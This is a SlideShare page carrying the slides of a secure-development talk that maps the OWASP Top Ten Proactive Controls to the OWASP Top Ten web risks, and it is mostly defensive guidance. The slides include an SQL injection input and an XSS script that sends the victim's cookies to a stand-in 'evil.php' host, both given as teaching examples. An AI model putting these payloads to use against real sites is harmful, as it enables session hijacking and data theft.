SlideShare une entreprise Scribd logo

Owasp top-ten-mapping-2015-05-lwc

Télécharger en tant que PPTX, PDF
K
Katy Anton

Most software developers have heard about OWASP Top Ten, describing the 10 most critical security vulnerabilities that should be avoided in web applications. However, in order to prevent them, developers must be aware of the proactive controls that should be incorporated from early stages of software development lifecycle. This talk briefly discusses the OWASP Top Ten Proactive Controls and then maps them to the respective OWASP Vulnerabilities that each of them addresses.

Logiciels
1  sur  50
OWASP Top Ten Mapping Katy Anton @katyanton 1
Katy Anton • Software developer by background • Certified Secure Software Lifecycle Practitioner (CSSLP) • OWASP volunteer • https//www.linkedin.com/in/katyanton • @katyanton 2
OWASP Top 10 Risks A1 - Injection A2 - Broken Authentication and Session Management A3 - Cross Site Scripting ( XSS ) A4 - Insecure Direct Object References A5 - Security Misconfiguration A6 - Sensitive Data Exposure A7 - Missing Function Level Access Control A8 - Cross-Site Request Forgery (CSRF) A9 - Using Components with Known Vulnerabilities A10- Unvalidated Redirects and Forwards 3
Software Development Lifecycle 4 Design Build Test Production Vulnerability Scanning Security testing, dynamic testing tools Coding guidelines, code reviews, static test tools Security requirements, secure design, threat modelling reactiveproactive
Warning This is an awareness document - that will give you some anchors - that you can start using on a regular basis - and start building on. You cannot base a web application on Top 10 only! 5
C1. Parameterize queries 6 Query parameterization prevents untrusted input from being interpreted as part of a SQL command: $sql = Update users set email=‘$email’ where id=1;
C1: Example of SQL injection 7 $email=‘;- - @owasp.org; $sql = UPDATE user set email=‘$email’ WHERE id=‘1’;
C1: Example of SQL injection 8 UPDATE user SET email=‘’; -- @owasp.org' WHERE id=‘1’
C1 Control: Data Access Layer 9 PHP: Example of Query Parametrisation $email = $_REQUEST[‘email’]; $id = $_REQUEST[‘id’]; $stmt = $dbh->prepare(”Update users set email=:new_email where id=:user_id”); $stmt->bindParam(':new_email', $email); $stmt->bindParam(':user_id', $id);
10 Proactive Control Risk(s) prevented C1: Parameterize Queries Leverage to Data Access Layer how parameters are interpreted before executing SQL. A1 Injection Injection flaws, such as SQL injection occur when untrusted data is sent to an interpreter as part of a command or query.
C2. Encode data before using a parser 11
C2: Example of XSS 12 <script type=“text/javascript”> var adr = ‘http://myaddress.com/evil.php? stolencookies=‘ + escape(document.cookie); var img = new Image(); img.src = adr; </script>
C2: Mechanisms for encoding Change from < 13
C2: Mechanisms for encoding Change from < to &lt; 14
C2: Resources Reform Project Java, .NET v1/v2, PHP, Python, Perl, JavaScript https://www.owasp.org/index.php/Category:OWASP_Enco ding_Project Java/Scala (Updated January 2015) https://www.owasp.org/index.php/OWASP_Java_Encoder_Proj ect 15
16 Proactive Control Risk(s) prevented C2: Encode Data Encode data before use in a parser ( JS, CSS , XML ) A1 Injection Injection flaws, such as SQL injection occur when untrusted data is sent to an interpreter as part of a command or query. A3 XSS XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
C3. Validate all input 17
C3: Example of Validations 18 • GET / POST data • File upload validate ( file extension, mime type, size) • HTTP Headers, cookies
19 Proactive Control Risk(s) prevented C3: Validate all inputs For web applications this includes: • GET and POST parameters: • File uploads • any or all of this data could be manipulated by an attacker. •A1 Injection •A3 XSS •A10 Unvalidated redirects and forwards
C4. Implement appropriate Access Control 20
C4: Access Control good practices • Deny by default • Force all requests to go through access control checks • Check on the server when each function is accessed 21
22 Proactive Control Risk(s) prevented C4: Implement Appropriate Access Controls •Deny by default •Force all requests to go through access control checks •Check on the server when each function is accessed A4-Insecure Direct Object References A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check, attackers can manipulate these references to access unauthorised data. A7-Missing Function Level Access Control Attackers will be able to forge requests in order to access functionality without proper authorization.
C5. Establish Authentication and Identity Controls 23
1). Protection: Password storage 24 1) Use cryptographically strong credential- specific salt • protect( [salt] + [password] ); • Use a 32char or 64char salt; • Do not depend on hiding, splitting, or otherwise obscuring the salt.
1). Protection: Password storage 25 2) Impose difficult verification on the attacker and defender •PBKDF2([salt] + [password], c=100,000); •Cryptgraphic recommendations: • PBKDF2 (Password-Based Key Derivation 2) • bcrypt • scrypt
1). Protection: Password storage 26 Resources: https://www.owasp.org/index.php/Password_Storage_ Cheat_Sheet
2). Protection: multi-factor authentication Multi-factor authentication - a combination of: • Something you know – password or PIN • Something you own – token, smart card or phone • Something you are – biometrics ( fingerprint ) 27
3). Protection: Forgot Password Forgot password design: 1). Ask one or more security questions 2) Send the user a randomly generated token via: app, SMS 3). Verify code in same web session. 4). Change password. More details on: https://www.owasp.org/index.php/Forgot_Password_Chea t_Sheet 28
29 Proactive Control Risk(s) prevented C5: Establish Identity and Authentication Controls • Design ( password storage) • Multi-factor authentication • Design ( forgot password ) A2-Broken Authentication and Session Management Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities.
C6. Data Protection and Privacy 30
C6 Controls: Data in transit Data in transit: HTTPS • Confidentiality: Spy cannot view your data • Integrity: Spy cannot change your data • Authenticity: Server you are visiting is the right one HTTPS configuration best practices • https://www.owasp.org/index.php/Transport_Layer _Protection_Cheat_Sheet Data at rest 31
C6 Controls: Data at rest 1. Algorithm • AES (Advanced Encryption Standard ) 2. Secure key management 3. Adequate access controls and auditing Resources: • https://www.owasp.org/index.php/Cryptographic_Stor age_Cheat_Sheet • https://www.ssllabs.com/ssltest/index.html 32
33 Proactive Control Risk(s) prevented C6: Data Protection and privacy • Data encryption at rest • Data encryption in transit A6: Sensitive Data Exposure Sensitive data needs extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.
34 Proactive Control Risk(s) prevented C1: Parameterize Queries Leverage to Data Access Layer how parameters are interpreted before executing SQL. • A1 Injection • A10 Unvalidated redirects and forwards OWASP Top Ten Mapping
35 Proactive Control Risk(s) prevented C1: Parameterize Queries Leverage to Data Access Layer how parameters are interpreted before executing SQL. • A1 Injection • A10 Unvalidated redirects and forwards C2: Encode Data Encode data before use in a parser ( JS, CSS , XML ) • A1 Injection • A3 XSS OWASP Top Ten Mapping
36 Proactive Control Risk(s) prevented C1: Parameterize Queries Leverage to Data Access Layer how parameters are interpreted before executing SQL. • A1 Injection • A10 Unvalidated redirects and forwards C2: Encode Data Encode data before use in a parser ( JS, CSS , XML ) • A1 Injection • A3 XSS C3: Validate all inputs • A1 Injection • A3 XSS • A10 Unvalidated redirects and forwards OWASP Top Ten Mapping
37 Proactive Control Risk(s) prevented C1: Parameterize Queries Leverage to Data Access Layer how parameters are interpreted before executing SQL. • A1 Injection • A10 Unvalidated redirects and forwards C2: Encode Data Encode data before use in a parser ( JS, CSS , XML ) • A1 Injection • A3 XSS C3: Validate all inputs • A1 Injection • A3 XSS • A10 Unvalidated redirects and forwards C4: Implement Appropriate Access Controls • A4 Insecure Direct Object References • A7 Missing Function Level Access Control OWASP Top Ten Mapping
38 Proactive Control Risk(s) prevented C1: Parameterize Queries Leverage to Data Access Layer how parameters are interpreted before executing SQL. • A1 Injection • A10 Unvalidated redirects and forwards C2: Encode Data Encode data before use in a parser ( JS, CSS , XML ) • A1 Injection • A3 XSS C3: Validate all inputs • A1 Injection • A3 XSS • A10 Unvalidated redirects and forwards C4: Implement Appropriate Access Controls • A4 Insecure Direct Object References • A7 Missing Function Level Access Control C5: Establish Identity and Authentication Controls Password storage / Multi-factor authentication / Forgot password design • A2 Broken Authentication and Session Management OWASP Top Ten Mapping
39 Proactive Control Risk(s) prevented C1: Parameterize Queries Leverage to Data Access Layer how parameters are interpreted before executing SQL. • A1 Injection • A10 Unvalidated redirects and forwards C2: Encode Data Encode data before use in a parser ( JS, CSS , XML ) • A1 Injection • A3 XSS C3: Validate all inputs • A1 Injection • A3 XSS • A10 Unvalidated redirects and forwards C4: Implement Appropriate Access Controls • A4 Insecure Direct Object References • A7 Missing Function Level Access Control C5: Establish Identity and Authentication Controls Password storage / Multi-factor authentication / Forgot password design • A2 Broken Authentication and Session Management C6: Data Protection and privacy Data encryption at rest / in transit • A6 Sensitive Data Exposure OWASP Top Ten Mapping
C7. Logging, Error Handling and Intrusion Detection 40
41 Proactive Control Risk(s) prevented C7: Implement Logging, Error Handling and Intrusion Detection A1-Injection A2-Broken Authentication and Session Management A3 XSS A4-Insecure Direct Object References A5-Security Misconfiguration A6-Sensitive Data Exposure A7-Missing Function Level Access Control A8-Cross-Site Request Forgery (CSRF) A9-Using Components with Known Vulnerabilities A10-Unvalidated Redirects and Forwards
C8. Leverage Security Features of Frameworks and Security Libraries 42
43 Proactive Control Risk(s) prevented C8: Leverage Security Features of Frameworks and Security Libraries For example: • Choose a good database ORM • Choose a framework with already build- in good access control • Choose a framework that already has integrated CSRF A1-Injection A2-Broken Authentication and Session Management A3 XSS A4-Insecure Direct Object References A5-Security Misconfiguration A6-Sensitive Data Exposure A7-Missing Function Level Access Control A8-Cross-Site Request Forgery (CSRF) A9-Using Components with Known Vulnerabilities A10-Unvalidated Redirects and Forwards
C9.Security Requirements 44
C9: Security Requirements Functional requirements > visible to QA and testable > E.q: forgot password workflow, re-authentication during change password Non-Functionals requirements : > invisible to QA, not easily testable > E.q: query parametrization, password storage crypto 45
46 Proactive Control Risk(s) prevented C9: Security Requirements Example of security requirements: • Integrity requirements • Availability requirements • Authentication & authorization requirements • Confidentiality requirements • Auditing and logging requirements • Session management requirements • Errors and exception management requirements • Configuration parameters requirements • Archiving requirements • Legal and Compliance Constraints A1-Injection A2-Broken Authentication and Session Management A3 XSS A4-Insecure Direct Object References A5-Security Misconfiguration A6-Sensitive Data Exposure A7-Missing Function Level Access Control A8-Cross-Site Request Forgery (CSRF) A9-Using Components with Known Vulnerabilities A10-Unvalidated Redirects and Forwards
C10. Security Architecture and Design 47
C10: Security Architecture and Design Principles Secure design principles: • Least Privilege = minimum access level for minimum amount of time • Separation of duties • Defence of depth. E.q.: • input validation + parameterize queries • input validation + output encoding • Fail secure. E.q.: • user access denied after maximum number of failed logins reached • errors and exception handling; store error details in database, give user only the reference ID • Complete mediation. E.q.: • centralise access control checks • centralise input validation 48
49 Proactive Control Risk(s) prevented C10: Security Architecture and Design Secure design principles: • Least Privilege • Separation of duties • Defence of depth • Fail secure • Complete mediation • Open design A1-Injection A2-Broken Authentication and Session Management A3 XSS A4-Insecure Direct Object References A5-Security Misconfiguration A6-Sensitive Data Exposure A7-Missing Function Level Access Control A8-Cross-Site Request Forgery (CSRF) A9-Using Components with Known Vulnerabilities A10-Unvalidated Redirects and Forwards
Thank you Questions 50

Recommandé

Platform Security IRL: Busting Buzzwords & Building Better
Platform Security IRL: Busting Buzzwords & Building BetterPlatform Security IRL: Busting Buzzwords & Building Better
Platform Security IRL: Busting Buzzwords & Building BetterEqual Experts
 
OWASP TOP 10
OWASP TOP 10OWASP TOP 10
OWASP TOP 10Robert MacLean
 
The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20
The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20
The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20Tabăra de Testare
 
The New OWASP Top Ten: Let's Cut to the Chase
The New OWASP Top Ten: Let's Cut to the ChaseThe New OWASP Top Ten: Let's Cut to the Chase
The New OWASP Top Ten: Let's Cut to the ChaseSecurity Innovation
 
Application Security Tools
Application Security ToolsApplication Security Tools
Application Security ToolsLalit Kale
 
Owasp first5 presentation
Owasp first5 presentationOwasp first5 presentation
Owasp first5 presentationAshwini Paranjpe
 
OWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksOWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksKun-Da Wu
 
Application Security-Understanding The Horizon
Application Security-Understanding The HorizonApplication Security-Understanding The Horizon
Application Security-Understanding The HorizonLalit Kale
 

Recommandé

Platform Security IRL: Busting Buzzwords & Building Better
Platform Security IRL: Busting Buzzwords & Building BetterPlatform Security IRL: Busting Buzzwords & Building Better
Platform Security IRL: Busting Buzzwords & Building BetterEqual Experts
 
OWASP TOP 10
OWASP TOP 10OWASP TOP 10
OWASP TOP 10Robert MacLean
 
The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20
The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20
The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20Tabăra de Testare
 
The New OWASP Top Ten: Let's Cut to the Chase
The New OWASP Top Ten: Let's Cut to the ChaseThe New OWASP Top Ten: Let's Cut to the Chase
The New OWASP Top Ten: Let's Cut to the ChaseSecurity Innovation
 
Application Security Tools
Application Security ToolsApplication Security Tools
Application Security ToolsLalit Kale
 
Owasp first5 presentation
Owasp first5 presentationOwasp first5 presentation
Owasp first5 presentationAshwini Paranjpe
 
OWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksOWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksKun-Da Wu
 
Application Security-Understanding The Horizon
Application Security-Understanding The HorizonApplication Security-Understanding The Horizon
Application Security-Understanding The HorizonLalit Kale
 
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...Aditya K Sood
 
OWASP Top 10 2017
OWASP Top 10 2017OWASP Top 10 2017
OWASP Top 10 2017Siddharth Phatarphod
 
Owasp 2017 oveview
Owasp 2017 oveviewOwasp 2017 oveview
Owasp 2017 oveviewShreyas N
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top TenSecurity Innovation
 
Owasp top 10
Owasp top 10Owasp top 10
Owasp top 10YasserElsnbary
 
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security RisksOWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security RisksAndre Van Klaveren
 
Owasp top 10 2017
Owasp top 10 2017Owasp top 10 2017
Owasp top 10 2017ibrahimumer2
 
Web attacks
Web attacksWeb attacks
Web attackshusnara mohammad
 
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...Security Innovation
 
Ten Commandments of Secure Coding
Ten Commandments of Secure CodingTen Commandments of Secure Coding
Ten Commandments of Secure CodingMateusz Olejarka
 
Beyond the OWASP Top 10
Beyond the OWASP Top 10Beyond the OWASP Top 10
Beyond the OWASP Top 10iphonepentest
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOWASP Delhi
 
OWASP Top 10 2017 - New Vulnerabilities
OWASP Top 10 2017 - New VulnerabilitiesOWASP Top 10 2017 - New Vulnerabilities
OWASP Top 10 2017 - New VulnerabilitiesDilum Bandara
 
Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017Aaron Hnatiw
 
OWASP TOP 10 & .NET
OWASP TOP 10 & .NETOWASP TOP 10 & .NET
OWASP TOP 10 & .NETDaniel Krasnokucki
 
Problems with parameters b sides-msp
Problems with parameters b sides-mspProblems with parameters b sides-msp
Problems with parameters b sides-mspMike Saunders
 
Owasp Top 10
Owasp Top 10Owasp Top 10
Owasp Top 10Shivam Porwal
 
Security Automation Simplified via NIST OSCAL: We’re Not in Kansas Anymore
Security Automation Simplified via NIST OSCAL: We’re Not in Kansas AnymoreSecurity Automation Simplified via NIST OSCAL: We’re Not in Kansas Anymore
Security Automation Simplified via NIST OSCAL: We’re Not in Kansas AnymorePriyanka Aash
 
THOR Apt Scanner
THOR Apt ScannerTHOR Apt Scanner
THOR Apt ScannerFlorian Roth
 
Why Johnny Still Can’t Pentest: A Comparative Analysis of Open-source Black-...
Why Johnny Still Can’t Pentest: A Comparative Analysis of Open-source Black-...Why Johnny Still Can’t Pentest: A Comparative Analysis of Open-source Black-...
Why Johnny Still Can’t Pentest: A Comparative Analysis of Open-source Black-...Rana Khalil
 
State of OWASP 2015
State of OWASP 2015State of OWASP 2015
State of OWASP 2015tmd800
 
Web hackingtools 2015
Web hackingtools 2015Web hackingtools 2015
Web hackingtools 2015ColdFusionConference
 

Contenu connexe

Tendances

BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...Aditya K Sood
 
Owasp 2017 oveview
Owasp 2017 oveviewOwasp 2017 oveview
Owasp 2017 oveviewShreyas N
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top TenSecurity Innovation
 
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security RisksOWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security RisksAndre Van Klaveren
 
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...Security Innovation
 
Ten Commandments of Secure Coding
Ten Commandments of Secure CodingTen Commandments of Secure Coding
Ten Commandments of Secure CodingMateusz Olejarka
 
Beyond the OWASP Top 10
Beyond the OWASP Top 10Beyond the OWASP Top 10
Beyond the OWASP Top 10iphonepentest
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOWASP Delhi
 
OWASP Top 10 2017 - New Vulnerabilities
OWASP Top 10 2017 - New VulnerabilitiesOWASP Top 10 2017 - New Vulnerabilities
OWASP Top 10 2017 - New VulnerabilitiesDilum Bandara
 
Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017Aaron Hnatiw
 
Problems with parameters b sides-msp
Problems with parameters b sides-mspProblems with parameters b sides-msp
Problems with parameters b sides-mspMike Saunders
 
Security Automation Simplified via NIST OSCAL: We’re Not in Kansas Anymore
Security Automation Simplified via NIST OSCAL: We’re Not in Kansas AnymoreSecurity Automation Simplified via NIST OSCAL: We’re Not in Kansas Anymore
Security Automation Simplified via NIST OSCAL: We’re Not in Kansas AnymorePriyanka Aash
 
Why Johnny Still Can’t Pentest: A Comparative Analysis of Open-source Black-...
Why Johnny Still Can’t Pentest: A Comparative Analysis of Open-source Black-...Why Johnny Still Can’t Pentest: A Comparative Analysis of Open-source Black-...
Why Johnny Still Can’t Pentest: A Comparative Analysis of Open-source Black-...Rana Khalil
 

Tendances (20)

BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
 
OWASP Top 10 2017
OWASP Top 10 2017OWASP Top 10 2017
OWASP Top 10 2017
 
Owasp 2017 oveview
Owasp 2017 oveviewOwasp 2017 oveview
Owasp 2017 oveview
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten
 
Owasp top 10
Owasp top 10Owasp top 10
Owasp top 10
 
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security RisksOWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
 
Owasp top 10 2017
Owasp top 10 2017Owasp top 10 2017
Owasp top 10 2017
 
Web attacks
Web attacksWeb attacks
Web attacks
 
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
 
Ten Commandments of Secure Coding
Ten Commandments of Secure CodingTen Commandments of Secure Coding
Ten Commandments of Secure Coding
 
Beyond the OWASP Top 10
Beyond the OWASP Top 10Beyond the OWASP Top 10
Beyond the OWASP Top 10
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilities
 
OWASP Top 10 2017 - New Vulnerabilities
OWASP Top 10 2017 - New VulnerabilitiesOWASP Top 10 2017 - New Vulnerabilities
OWASP Top 10 2017 - New Vulnerabilities
 
Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017
 
OWASP TOP 10 & .NET
OWASP TOP 10 & .NETOWASP TOP 10 & .NET
OWASP TOP 10 & .NET
 
Problems with parameters b sides-msp
Problems with parameters b sides-mspProblems with parameters b sides-msp
Problems with parameters b sides-msp
 
Owasp Top 10
Owasp Top 10Owasp Top 10
Owasp Top 10
 
Security Automation Simplified via NIST OSCAL: We’re Not in Kansas Anymore
Security Automation Simplified via NIST OSCAL: We’re Not in Kansas AnymoreSecurity Automation Simplified via NIST OSCAL: We’re Not in Kansas Anymore
Security Automation Simplified via NIST OSCAL: We’re Not in Kansas Anymore
 
THOR Apt Scanner
THOR Apt ScannerTHOR Apt Scanner
THOR Apt Scanner
 
Why Johnny Still Can’t Pentest: A Comparative Analysis of Open-source Black-...
Why Johnny Still Can’t Pentest: A Comparative Analysis of Open-source Black-...Why Johnny Still Can’t Pentest: A Comparative Analysis of Open-source Black-...
Why Johnny Still Can’t Pentest: A Comparative Analysis of Open-source Black-...
 

En vedette

State of OWASP 2015
State of OWASP 2015State of OWASP 2015
State of OWASP 2015tmd800
 
Appsecurity, win or loose
Appsecurity, win or looseAppsecurity, win or loose
Appsecurity, win or looseBjørn Sloth
 
OWASP Open SAMM
OWASP Open SAMMOWASP Open SAMM
OWASP Open SAMMintive
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
OWASP, PHP, life and universe
OWASP, PHP, life and universeOWASP, PHP, life and universe
OWASP, PHP, life and universeSebastien Gioria
 
OWASP 2015 AppSec EU ZAP 2.4.0 and beyond..
OWASP 2015 AppSec EU ZAP 2.4.0 and beyond..OWASP 2015 AppSec EU ZAP 2.4.0 and beyond..
OWASP 2015 AppSec EU ZAP 2.4.0 and beyond..Simon Bennetts
 
Web Application Security | A developer's perspective - Insecure Direct Object...
Web Application Security | A developer's perspective - Insecure Direct Object...Web Application Security | A developer's perspective - Insecure Direct Object...
Web Application Security | A developer's perspective - Insecure Direct Object...n|u - The Open Security Community
 
Rebooting Software Development - OWASP AppSecUSA
Rebooting Software Development - OWASP AppSecUSA Rebooting Software Development - OWASP AppSecUSA
Rebooting Software Development - OWASP AppSecUSA Nick Galbreath
 
Owasp top 10 security threats
Owasp top 10 security threatsOwasp top 10 security threats
Owasp top 10 security threatsVishal Kumar
 
OWASP OWTF - Summer Storm - OWASP AppSec EU 2013
OWASP OWTF - Summer Storm - OWASP AppSec EU 2013OWASP OWTF - Summer Storm - OWASP AppSec EU 2013
OWASP OWTF - Summer Storm - OWASP AppSec EU 2013Abraham Aranguren
 
OWASP Free Training - SF2014 - Keary and Manico
OWASP Free Training - SF2014 - Keary and ManicoOWASP Free Training - SF2014 - Keary and Manico
OWASP Free Training - SF2014 - Keary and ManicoEoin Keary
 
RSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingRSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingJim Manico
 
The OWASP Zed Attack Proxy
The OWASP Zed Attack ProxyThe OWASP Zed Attack Proxy
The OWASP Zed Attack ProxyAditya Gupta
 
[Wroclaw #5] OWASP Projects: beyond Top 10
[Wroclaw #5] OWASP Projects: beyond Top 10[Wroclaw #5] OWASP Projects: beyond Top 10
[Wroclaw #5] OWASP Projects: beyond Top 10OWASP
 

En vedette (20)

State of OWASP 2015
State of OWASP 2015State of OWASP 2015
State of OWASP 2015
 
Web hackingtools 2015
Web hackingtools 2015Web hackingtools 2015
Web hackingtools 2015
 
Appsecurity, win or loose
Appsecurity, win or looseAppsecurity, win or loose
Appsecurity, win or loose
 
OWASP AppSec USA 2015, San Francisco
OWASP AppSec USA 2015, San FranciscoOWASP AppSec USA 2015, San Francisco
OWASP AppSec USA 2015, San Francisco
 
OWASP Open SAMM
OWASP Open SAMMOWASP Open SAMM
OWASP Open SAMM
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
OWASP, PHP, life and universe
OWASP, PHP, life and universeOWASP, PHP, life and universe
OWASP, PHP, life and universe
 
OWASP 2015 AppSec EU ZAP 2.4.0 and beyond..
OWASP 2015 AppSec EU ZAP 2.4.0 and beyond..OWASP 2015 AppSec EU ZAP 2.4.0 and beyond..
OWASP 2015 AppSec EU ZAP 2.4.0 and beyond..
 
Web Application Security | A developer's perspective - Insecure Direct Object...
Web Application Security | A developer's perspective - Insecure Direct Object...Web Application Security | A developer's perspective - Insecure Direct Object...
Web Application Security | A developer's perspective - Insecure Direct Object...
 
Rebooting Software Development - OWASP AppSecUSA
Rebooting Software Development - OWASP AppSecUSA Rebooting Software Development - OWASP AppSecUSA
Rebooting Software Development - OWASP AppSecUSA
 
Owasp Au Rev4
Owasp Au Rev4Owasp Au Rev4
Owasp Au Rev4
 
Owasp top 10 security threats
Owasp top 10 security threatsOwasp top 10 security threats
Owasp top 10 security threats
 
OWASP OWTF - Summer Storm - OWASP AppSec EU 2013
OWASP OWTF - Summer Storm - OWASP AppSec EU 2013OWASP OWTF - Summer Storm - OWASP AppSec EU 2013
OWASP OWTF - Summer Storm - OWASP AppSec EU 2013
 
OWASP Free Training - SF2014 - Keary and Manico
OWASP Free Training - SF2014 - Keary and ManicoOWASP Free Training - SF2014 - Keary and Manico
OWASP Free Training - SF2014 - Keary and Manico
 
RSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingRSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP Training
 
OWASP Top Ten in Practice
OWASP Top Ten in PracticeOWASP Top Ten in Practice
OWASP Top Ten in Practice
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: Injection
 
Basic of SSDLC
Basic of SSDLCBasic of SSDLC
Basic of SSDLC
 
The OWASP Zed Attack Proxy
The OWASP Zed Attack ProxyThe OWASP Zed Attack Proxy
The OWASP Zed Attack Proxy
 
[Wroclaw #5] OWASP Projects: beyond Top 10
[Wroclaw #5] OWASP Projects: beyond Top 10[Wroclaw #5] OWASP Projects: beyond Top 10
[Wroclaw #5] OWASP Projects: beyond Top 10
 

Similaire à Owasp top-ten-mapping-2015-05-lwc

The path of secure software by Katy Anton
The path of secure software by Katy AntonThe path of secure software by Katy Anton
The path of secure software by Katy AntonDevSecCon
 
OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsKaty Anton
 
How to avoid top 10 security risks in Java EE applications and how to avoid them
How to avoid top 10 security risks in Java EE applications and how to avoid themHow to avoid top 10 security risks in Java EE applications and how to avoid them
How to avoid top 10 security risks in Java EE applications and how to avoid themMasoud Kalali
 
Web hackingtools 2015
Web hackingtools 2015Web hackingtools 2015
Web hackingtools 2015devObjective
 
How to Harden the Security of Your .NET Website
How to Harden the Security of Your .NET WebsiteHow to Harden the Security of Your .NET Website
How to Harden the Security of Your .NET WebsiteDNN
 
owasp top 10 security risk categories and CWE
owasp top 10 security risk categories and CWEowasp top 10 security risk categories and CWE
owasp top 10 security risk categories and CWEArun Voleti
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
Secure SDLC for Software
Secure SDLC for Software Secure SDLC for Software
Secure SDLC for Software Shreeraj Shah
 
Css sf azure_8-9-17-protecting_web_apps_stephen coty_al
Css sf azure_8-9-17-protecting_web_apps_stephen coty_alCss sf azure_8-9-17-protecting_web_apps_stephen coty_al
Css sf azure_8-9-17-protecting_web_apps_stephen coty_alAlert Logic
 
CSS17: Houston - Protecting Web Apps
CSS17: Houston - Protecting Web AppsCSS17: Houston - Protecting Web Apps
CSS17: Houston - Protecting Web AppsAlert Logic
 
